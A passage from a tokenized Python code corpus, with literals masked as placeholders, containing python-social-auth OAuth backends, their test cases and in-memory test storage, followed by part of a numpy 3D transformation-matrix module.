create_permission_url ( <EOL> scope = scope , <EOL> redirect_uri = redirect_uri <EOL> ) <EOL> @ handle_http_errors <EOL> def auth_complete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . process_error ( self . data ) <EOL> access_token = None <EOL> key , secret = self . get_key_and_secret ( ) <EOL> try : <EOL> shop_url = self . data . get ( '<STR_LIT>' ) <EOL> self . shopifyAPI . Session . setup ( api_key = key , secret = secret ) <EOL> shopify_session = self . shopifyAPI . Session ( shop_url , self . data ) <EOL> access_token = shopify_session . token <EOL> except self . shopifyAPI . ValidationException : <EOL> raise AuthCanceled ( self ) <EOL> else : <EOL> if not access_token : <EOL> raise AuthFailed ( self , '<STR_LIT>' ) <EOL> return self . do_auth ( access_token , shop_url , shopify_session . url , <EOL> * args , ** kwargs ) <EOL> def do_auth ( self , access_token , shop_url , website , * args , ** kwargs ) : <EOL> kwargs . update ( { <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : shop_url , <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( website ) , <EOL> '<STR_LIT>' : access_token <EOL> } <EOL> } ) <EOL> return self . strategy . authenticate ( * args , ** kwargs ) </s>
<s> from social . backends . oauth import BaseOAuth1 <EOL> class WithingsOAuth ( BaseOAuth1 ) : <EOL> name = '<STR_LIT>' <EOL> AUTHORIZATION_URL = '<STR_LIT>' <EOL> REQUEST_TOKEN_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_URL = '<STR_LIT>' <EOL> ID_KEY = '<STR_LIT>' <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : response [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> '<STR_LIT:email>' : '<STR_LIT>' } </s>
<s> from social . utils import module_member <EOL> _current_strategy_getter = None <EOL> def get_strategy ( strategy , storage , * args , ** kwargs ) : <EOL> Strategy = module_member ( strategy ) <EOL> Storage = module_member ( storage ) <EOL> return Strategy ( Storage , * args , ** kwargs ) <EOL> def set_current_strategy_getter ( func ) : <EOL> global _current_strategy_getter <EOL> _current_strategy_getter = func <EOL> def get_current_strategy ( ) : <EOL> global _current_strategy_getter <EOL> if _current_strategy_getter is not None : <EOL> return _current_strategy_getter ( ) </s>
<s> import json <EOL> import datetime <EOL> import time <EOL> from httpretty import HTTPretty <EOL> from social . actions import do_disconnect <EOL> from social . backends . oauth import BaseOAuth2 <EOL> from social . exceptions import AuthForbidden <EOL> from social . tests . models import User <EOL> from social . tests . backends . oauth import OAuth2Test <EOL> class DummyOAuth2 ( BaseOAuth2 ) : <EOL> name = '<STR_LIT>' <EOL> AUTHORIZATION_URL = '<STR_LIT>' <EOL> ACCESS_TOKEN_URL = '<STR_LIT>' <EOL> REVOKE_TOKEN_URL = '<STR_LIT>' <EOL> REVOKE_TOKEN_METHOD = '<STR_LIT:GET>' <EOL> EXTRA_DATA = [ <EOL> ( '<STR_LIT:id>' , '<STR_LIT:id>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , True ) , <EOL> '<STR_LIT:url>' <EOL> ] <EOL> def get_user_details ( self , response ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT:username>' : response . get ( '<STR_LIT:username>' ) , <EOL> '<STR_LIT:email>' : response . get ( '<STR_LIT:email>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : response . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : response . get ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> def user_data ( self , access_token , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . get_json ( '<STR_LIT>' , params = { <EOL> '<STR_LIT>' : access_token <EOL> } ) <EOL> class DummyOAuth2Test ( OAuth2Test ) : <EOL> backend_path = '<STR_LIT>' <EOL> user_data_url = '<STR_LIT>' <EOL> expected_username = '<STR_LIT>' <EOL> access_token_body = json . dumps ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> user_data_body = json . dumps ( { <EOL> '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' <EOL> } ) <EOL> def test_login ( self ) : <EOL> self . do_login ( ) <EOL> def test_partial_pipeline ( self ) : <EOL> self . 
do_partial_pipeline ( ) <EOL> def test_tokens ( self ) : <EOL> user = self . do_login ( ) <EOL> self . assertEqual ( user . social [ <NUM_LIT:0> ] . access_token , '<STR_LIT>' ) <EOL> def test_revoke_token ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> self . do_login ( ) <EOL> user = User . get ( self . expected_username ) <EOL> user . password = '<STR_LIT:password>' <EOL> HTTPretty . register_uri ( self . _method ( self . backend . REVOKE_TOKEN_METHOD ) , <EOL> self . backend . REVOKE_TOKEN_URL , <EOL> status = <NUM_LIT:200> ) <EOL> do_disconnect ( self . backend , user ) <EOL> class WhitelistEmailsTest ( DummyOAuth2Test ) : <EOL> def test_valid_login ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } ) <EOL> self . do_login ( ) <EOL> def test_invalid_login ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } ) <EOL> with self . assertRaises ( AuthForbidden ) : <EOL> self . do_login ( ) <EOL> class WhitelistDomainsTest ( DummyOAuth2Test ) : <EOL> def test_valid_login ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } ) <EOL> self . do_login ( ) <EOL> def test_invalid_login ( self ) : <EOL> self . strategy . set_settings ( { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } ) <EOL> with self . assertRaises ( AuthForbidden ) : <EOL> self . do_login ( ) <EOL> DELTA = datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> class ExpirationTimeTest ( DummyOAuth2Test ) : <EOL> user_data_body = json . dumps ( { <EOL> '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : time . mktime ( ( datetime . datetime . utcnow ( ) + <EOL> DELTA ) . timetuple ( ) ) <EOL> } ) <EOL> def test_expires_time ( self ) : <EOL> user = self . 
do_login ( ) <EOL> social = user . social [ <NUM_LIT:0> ] <EOL> expiration = social . expiration_datetime ( ) <EOL> self . assertEqual ( expiration <= DELTA , True ) </s>
<s> import json <EOL> from social . tests . backends . oauth import OAuth2Test <EOL> class QiitaOAuth2Test ( OAuth2Test ) : <EOL> backend_path = '<STR_LIT>' <EOL> user_data_url = '<STR_LIT>' <EOL> expected_username = '<STR_LIT>' <EOL> access_token_body = json . dumps ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> user_data_body = json . dumps ( { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } ) <EOL> def test_login ( self ) : <EOL> self . do_login ( ) <EOL> def test_partial_pipeline ( self ) : <EOL> self . do_partial_pipeline ( ) </s>
<s> import base64 <EOL> from social . storage . base import UserMixin , NonceMixin , AssociationMixin , CodeMixin , BaseStorage <EOL> class BaseModel ( object ) : <EOL> @ classmethod <EOL> def next_id ( cls ) : <EOL> cls . NEXT_ID += <NUM_LIT:1> <EOL> return cls . NEXT_ID - <NUM_LIT:1> <EOL> @ classmethod <EOL> def get ( cls , key ) : <EOL> return cls . cache . get ( key ) <EOL> @ classmethod <EOL> def reset_cache ( cls ) : <EOL> cls . cache = { } <EOL> class User ( BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> _is_active = True <EOL> def __init__ ( self , username , email = None , ** extra_user_fields ) : <EOL> self . id = User . next_id ( ) <EOL> self . username = username <EOL> self . email = email <EOL> self . password = None <EOL> self . slug = None <EOL> self . social = [ ] <EOL> self . extra_data = { } <EOL> self . extra_user_fields = extra_user_fields <EOL> self . save ( ) <EOL> def is_active ( self ) : <EOL> return self . _is_active <EOL> @ classmethod <EOL> def set_active ( cls , is_active = True ) : <EOL> cls . _is_active = is_active <EOL> def set_password ( self , password ) : <EOL> self . password = password <EOL> def save ( self ) : <EOL> User . cache [ self . username ] = self <EOL> class TestUserSocialAuth ( UserMixin , BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> cache_by_uid = { } <EOL> def __init__ ( self , user , provider , uid , extra_data = None ) : <EOL> self . id = TestUserSocialAuth . next_id ( ) <EOL> self . user = user <EOL> self . provider = provider <EOL> self . uid = uid <EOL> self . extra_data = extra_data or { } <EOL> self . user . social . append ( self ) <EOL> TestUserSocialAuth . cache_by_uid [ uid ] = self <EOL> def save ( self ) : <EOL> pass <EOL> @ classmethod <EOL> def reset_cache ( cls ) : <EOL> cls . cache = { } <EOL> cls . 
cache_by_uid = { } <EOL> @ classmethod <EOL> def changed ( cls , user ) : <EOL> pass <EOL> @ classmethod <EOL> def get_username ( cls , user ) : <EOL> return user . username <EOL> @ classmethod <EOL> def user_model ( cls ) : <EOL> return User <EOL> @ classmethod <EOL> def username_max_length ( cls ) : <EOL> return <NUM_LIT> <EOL> @ classmethod <EOL> def allowed_to_disconnect ( cls , user , backend_name , association_id = None ) : <EOL> return user . password or len ( user . social ) > <NUM_LIT:1> <EOL> @ classmethod <EOL> def disconnect ( cls , entry ) : <EOL> cls . cache . pop ( entry . id , None ) <EOL> entry . user . social = [ s for s in entry . user . social if entry != s ] <EOL> @ classmethod <EOL> def user_exists ( cls , username ) : <EOL> return User . cache . get ( username ) is not None <EOL> @ classmethod <EOL> def create_user ( cls , username , email = None , ** extra_user_fields ) : <EOL> return User ( username = username , email = email , ** extra_user_fields ) <EOL> @ classmethod <EOL> def get_user ( cls , pk ) : <EOL> for username , user in User . cache . items ( ) : <EOL> if user . id == pk : <EOL> return user <EOL> @ classmethod <EOL> def get_social_auth ( cls , provider , uid ) : <EOL> social_user = cls . cache_by_uid . get ( uid ) <EOL> if social_user and social_user . provider == provider : <EOL> return social_user <EOL> @ classmethod <EOL> def get_social_auth_for_user ( cls , user , provider = None , id = None ) : <EOL> return [ usa for usa in user . social <EOL> if provider in ( None , usa . provider ) and <EOL> id in ( None , usa . id ) ] <EOL> @ classmethod <EOL> def create_social_auth ( cls , user , uid , provider ) : <EOL> return cls ( user = user , provider = provider , uid = uid ) <EOL> @ classmethod <EOL> def get_users_by_email ( cls , email ) : <EOL> return [ user for user in User . cache . values ( ) if user . 
email == email ] <EOL> class TestNonce ( NonceMixin , BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> def __init__ ( self , server_url , timestamp , salt ) : <EOL> self . id = TestNonce . next_id ( ) <EOL> self . server_url = server_url <EOL> self . timestamp = timestamp <EOL> self . salt = salt <EOL> @ classmethod <EOL> def use ( cls , server_url , timestamp , salt ) : <EOL> nonce = TestNonce ( server_url , timestamp , salt ) <EOL> TestNonce . cache [ server_url ] = nonce <EOL> return nonce <EOL> class TestAssociation ( AssociationMixin , BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> def __init__ ( self , server_url , handle ) : <EOL> self . id = TestAssociation . next_id ( ) <EOL> self . server_url = server_url <EOL> self . handle = handle <EOL> def save ( self ) : <EOL> TestAssociation . cache [ ( self . server_url , self . handle ) ] = self <EOL> @ classmethod <EOL> def store ( cls , server_url , association ) : <EOL> assoc = TestAssociation . cache . get ( ( server_url , association . handle ) ) <EOL> if assoc is None : <EOL> assoc = TestAssociation ( server_url = server_url , <EOL> handle = association . handle ) <EOL> assoc . secret = base64 . encodestring ( association . secret ) <EOL> assoc . issued = association . issued <EOL> assoc . lifetime = association . lifetime <EOL> assoc . assoc_type = association . assoc_type <EOL> assoc . save ( ) <EOL> @ classmethod <EOL> def get ( cls , server_url = None , handle = None ) : <EOL> result = [ ] <EOL> for assoc in TestAssociation . cache . values ( ) : <EOL> if server_url and assoc . server_url != server_url : <EOL> continue <EOL> if handle and assoc . handle != handle : <EOL> continue <EOL> result . append ( assoc ) <EOL> return result <EOL> @ classmethod <EOL> def remove ( cls , ids_to_delete ) : <EOL> assoc = filter ( lambda a : a . id in ids_to_delete , <EOL> TestAssociation . cache . values ( ) ) <EOL> for a in list ( assoc ) : <EOL> TestAssociation . cache . 
pop ( ( a . server_url , a . handle ) , None ) <EOL> class TestCode ( CodeMixin , BaseModel ) : <EOL> NEXT_ID = <NUM_LIT:1> <EOL> cache = { } <EOL> @ classmethod <EOL> def get_code ( cls , code ) : <EOL> for c in cls . cache . values ( ) : <EOL> if c . code == code : <EOL> return c <EOL> class TestStorage ( BaseStorage ) : <EOL> user = TestUserSocialAuth <EOL> nonce = TestNonce <EOL> association = TestAssociation <EOL> code = TestCode </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import warnings <EOL> import math <EOL> import numpy <EOL> __docformat__ = "<STR_LIT>" <EOL> def identity_matrix ( ) : <EOL> """<STR_LIT>""" <EOL> return numpy . identity ( <NUM_LIT:4> , dtype = numpy . float64 ) <EOL> def translation_matrix ( direction ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = direction [ : <NUM_LIT:3> ] <EOL> return M <EOL> def translation_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> return numpy . array ( matrix , copy = False ) [ : <NUM_LIT:3> , <NUM_LIT:3> ] . copy ( ) <EOL> def reflection_matrix ( point , normal ) : <EOL> """<STR_LIT>""" <EOL> normal = unit_vector ( normal [ : <NUM_LIT:3> ] ) <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= <NUM_LIT> * numpy . outer ( normal , normal ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = ( <NUM_LIT> * numpy . dot ( point [ : <NUM_LIT:3> ] , normal ) ) * normal <EOL> return M <EOL> def reflection_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> l , V = numpy . linalg . eig ( M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) + <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> normal = numpy . real ( V [ : , i [ <NUM_LIT:0> ] ] ) . squeeze ( ) <EOL> l , V = numpy . linalg . eig ( M ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> point = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> return point , normal <EOL> def rotation_matrix ( angle , direction , point = None ) : <EOL> """<STR_LIT>""" <EOL> sina = math . sin ( angle ) <EOL> cosa = math . 
cos ( angle ) <EOL> direction = unit_vector ( direction [ : <NUM_LIT:3> ] ) <EOL> R = numpy . array ( ( ( cosa , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , cosa , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , cosa ) ) , dtype = numpy . float64 ) <EOL> R += numpy . outer ( direction , direction ) * ( <NUM_LIT:1.0> - cosa ) <EOL> direction *= sina <EOL> R += numpy . array ( ( ( <NUM_LIT:0.0> , - direction [ <NUM_LIT:2> ] , direction [ <NUM_LIT:1> ] ) , <EOL> ( direction [ <NUM_LIT:2> ] , <NUM_LIT:0.0> , - direction [ <NUM_LIT:0> ] ) , <EOL> ( - direction [ <NUM_LIT:1> ] , direction [ <NUM_LIT:0> ] , <NUM_LIT:0.0> ) ) , <EOL> dtype = numpy . float64 ) <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] = R <EOL> if point is not None : <EOL> point = numpy . array ( point [ : <NUM_LIT:3> ] , dtype = numpy . float64 , copy = False ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = point - numpy . dot ( R , point ) <EOL> return M <EOL> def rotation_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> R = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> R33 = R [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> l , W = numpy . linalg . eig ( R33 . T ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> direction = numpy . real ( W [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> l , Q = numpy . linalg . eig ( R ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> point = numpy . real ( Q [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> cosa = ( numpy . 
trace ( R33 ) - <NUM_LIT:1.0> ) / <NUM_LIT> <EOL> if abs ( direction [ <NUM_LIT:2> ] ) > <NUM_LIT> : <EOL> sina = ( R [ <NUM_LIT:1> , <NUM_LIT:0> ] + ( cosa - <NUM_LIT:1.0> ) * direction [ <NUM_LIT:0> ] * direction [ <NUM_LIT:1> ] ) / direction [ <NUM_LIT:2> ] <EOL> elif abs ( direction [ <NUM_LIT:1> ] ) > <NUM_LIT> : <EOL> sina = ( R [ <NUM_LIT:0> , <NUM_LIT:2> ] + ( cosa - <NUM_LIT:1.0> ) * direction [ <NUM_LIT:0> ] * direction [ <NUM_LIT:2> ] ) / direction [ <NUM_LIT:1> ] <EOL> else : <EOL> sina = ( R [ <NUM_LIT:2> , <NUM_LIT:1> ] + ( cosa - <NUM_LIT:1.0> ) * direction [ <NUM_LIT:1> ] * direction [ <NUM_LIT:2> ] ) / direction [ <NUM_LIT:0> ] <EOL> angle = math . atan2 ( sina , cosa ) <EOL> return angle , direction , point <EOL> def scale_matrix ( factor , origin = None , direction = None ) : <EOL> """<STR_LIT>""" <EOL> if direction is None : <EOL> M = numpy . array ( ( ( factor , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , factor , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , factor , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) ) , dtype = numpy . float64 ) <EOL> if origin is not None : <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = origin [ : <NUM_LIT:3> ] <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] *= <NUM_LIT:1.0> - factor <EOL> else : <EOL> direction = unit_vector ( direction [ : <NUM_LIT:3> ] ) <EOL> factor = <NUM_LIT:1.0> - factor <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= factor * numpy . outer ( direction , direction ) <EOL> if origin is not None : <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = ( factor * numpy . dot ( origin [ : <NUM_LIT:3> ] , direction ) ) * direction <EOL> return M <EOL> def scale_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> M33 = M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> factor = numpy . 
trace ( M33 ) - <NUM_LIT> <EOL> try : <EOL> l , V = numpy . linalg . eig ( M33 ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - factor ) < <NUM_LIT> ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> direction = numpy . real ( V [ : , i ] ) . squeeze ( ) <EOL> direction /= vector_norm ( direction ) <EOL> except IndexError : <EOL> factor = ( factor + <NUM_LIT> ) / <NUM_LIT> <EOL> direction = None <EOL> l , V = numpy . linalg . eig ( M ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> origin = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> origin /= origin [ <NUM_LIT:3> ] <EOL> return factor , origin , direction <EOL> def projection_matrix ( point , normal , direction = None , <EOL> perspective = None , pseudo = False ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> point = numpy . array ( point [ : <NUM_LIT:3> ] , dtype = numpy . float64 , copy = False ) <EOL> normal = unit_vector ( normal [ : <NUM_LIT:3> ] ) <EOL> if perspective is not None : <EOL> perspective = numpy . array ( perspective [ : <NUM_LIT:3> ] , dtype = numpy . float64 , <EOL> copy = False ) <EOL> M [ <NUM_LIT:0> , <NUM_LIT:0> ] = M [ <NUM_LIT:1> , <NUM_LIT:1> ] = M [ <NUM_LIT:2> , <NUM_LIT:2> ] = numpy . dot ( perspective - point , normal ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= numpy . outer ( perspective , normal ) <EOL> if pseudo : <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= numpy . outer ( normal , normal ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = numpy . dot ( point , normal ) * ( perspective + normal ) <EOL> else : <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = numpy . dot ( point , normal ) * perspective <EOL> M [ <NUM_LIT:3> , : <NUM_LIT:3> ] = - normal <EOL> M [ <NUM_LIT:3> , <NUM_LIT:3> ] = numpy . dot ( perspective , normal ) <EOL> elif direction is not None : <EOL> direction = numpy . 
array ( direction [ : <NUM_LIT:3> ] , dtype = numpy . float64 , copy = False ) <EOL> scale = numpy . dot ( direction , normal ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= numpy . outer ( direction , normal ) / scale <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = direction * ( numpy . dot ( point , normal ) / scale ) <EOL> else : <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] -= numpy . outer ( normal , normal ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = numpy . dot ( point , normal ) * normal <EOL> return M <EOL> def projection_from_matrix ( matrix , pseudo = False ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> M33 = M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> l , V = numpy . linalg . eig ( M ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not pseudo and len ( i ) : <EOL> point = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> l , V = numpy . linalg . eig ( M33 ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> direction = numpy . real ( V [ : , i [ <NUM_LIT:0> ] ] ) . squeeze ( ) <EOL> direction /= vector_norm ( direction ) <EOL> l , V = numpy . linalg . eig ( M33 . T ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if len ( i ) : <EOL> normal = numpy . real ( V [ : , i [ <NUM_LIT:0> ] ] ) . squeeze ( ) <EOL> normal /= vector_norm ( normal ) <EOL> return point , normal , direction , None , False <EOL> else : <EOL> return point , direction , None , None , False <EOL> else : <EOL> i = numpy . where ( abs ( numpy . real ( l ) ) > <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> point = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . 
squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> normal = - M [ <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> perspective = M [ : <NUM_LIT:3> , <NUM_LIT:3> ] / numpy . dot ( point [ : <NUM_LIT:3> ] , normal ) <EOL> if pseudo : <EOL> perspective -= normal <EOL> return point , normal , None , perspective , pseudo <EOL> def clip_matrix ( left , right , bottom , top , near , far , perspective = False ) : <EOL> """<STR_LIT>""" <EOL> if left >= right or bottom >= top or near >= far : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if perspective : <EOL> if near <= _EPS : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> t = <NUM_LIT> * near <EOL> M = ( ( - t / ( right - left ) , <NUM_LIT:0.0> , ( right + left ) / ( right - left ) , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , - t / ( top - bottom ) , ( top + bottom ) / ( top - bottom ) , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , - ( far + near ) / ( far - near ) , t * far / ( far - near ) ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , - <NUM_LIT:1.0> , <NUM_LIT:0.0> ) ) <EOL> else : <EOL> M = ( ( <NUM_LIT> / ( right - left ) , <NUM_LIT:0.0> , <NUM_LIT:0.0> , ( right + left ) / ( left - right ) ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> / ( top - bottom ) , <NUM_LIT:0.0> , ( top + bottom ) / ( bottom - top ) ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> / ( far - near ) , ( far + near ) / ( near - far ) ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) ) <EOL> return numpy . array ( M , dtype = numpy . float64 ) <EOL> def shear_matrix ( angle , direction , point , normal ) : <EOL> """<STR_LIT>""" <EOL> normal = unit_vector ( normal [ : <NUM_LIT:3> ] ) <EOL> direction = unit_vector ( direction [ : <NUM_LIT:3> ] ) <EOL> if abs ( numpy . dot ( normal , direction ) ) > <NUM_LIT> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> angle = math . tan ( angle ) <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] += angle * numpy . 
outer ( direction , normal ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = - angle * numpy . dot ( point [ : <NUM_LIT:3> ] , normal ) * direction <EOL> return M <EOL> def shear_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) <EOL> M33 = M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> l , V = numpy . linalg . eig ( M33 ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if len ( i ) < <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" % l ) <EOL> V = numpy . real ( V [ : , i ] ) . squeeze ( ) . T <EOL> lenorm = - <NUM_LIT:1.0> <EOL> for i0 , i1 in ( ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) : <EOL> n = numpy . cross ( V [ i0 ] , V [ i1 ] ) <EOL> l = vector_norm ( n ) <EOL> if l > lenorm : <EOL> lenorm = l <EOL> normal = n <EOL> normal /= lenorm <EOL> direction = numpy . dot ( M33 - numpy . identity ( <NUM_LIT:3> ) , normal ) <EOL> angle = vector_norm ( direction ) <EOL> direction /= angle <EOL> angle = math . atan ( angle ) <EOL> l , V = numpy . linalg . eig ( M ) <EOL> i = numpy . where ( abs ( numpy . real ( l ) - <NUM_LIT:1.0> ) < <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> if not len ( i ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> point = numpy . real ( V [ : , i [ - <NUM_LIT:1> ] ] ) . squeeze ( ) <EOL> point /= point [ <NUM_LIT:3> ] <EOL> return angle , direction , point , normal <EOL> def decompose_matrix ( matrix ) : 